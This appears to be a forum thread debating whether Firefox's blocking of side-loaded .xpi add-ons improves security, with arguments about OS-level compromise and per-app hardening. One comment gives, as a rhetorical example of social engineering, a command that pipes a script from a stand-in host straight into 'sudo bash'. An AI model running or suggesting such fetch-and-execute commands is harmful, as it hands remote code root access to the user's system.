[mburns]

Just because we existed without them before doesn't mean the restrictions weren't needed.

We always needed Sandboxing and multi-process Firefox, even though we were able to get by without it for years. Likewise, side-loaded add-ons that can steal your information are a legit security threat, even if you think you're such a smart user that you could somehow avoid ever being burned by it.

[the8472]

> side-loaded add-ons that can steal your information are a legit security threat

How so? Sideloading means OS-level access. OS-level access means your whole user account is already compromised if it was malicious software.

There is no additional security gained by preventing side-loading after malicious software already got into your system.

If someone social-engineers you into "install this .xpi" they might as well manage to trick you into "run this .jar" or "run this .exe" or please "curl http://pleaseexploit.me/ | sudo bash" to check out our newest software!

[Tobu]

OSes are getting hardened with a per-app security model (instead of per-account which you describe). Hardening Firefox so that it won't compromise itself through XPI (which are opaque to the OS) is part of a defense in depth strategy. Security policies can prevent applications from scribbling over each other's memories as a general rule, whereas attaching security labels to profile directories requires targeted policies that are much more fragile and full of false positives.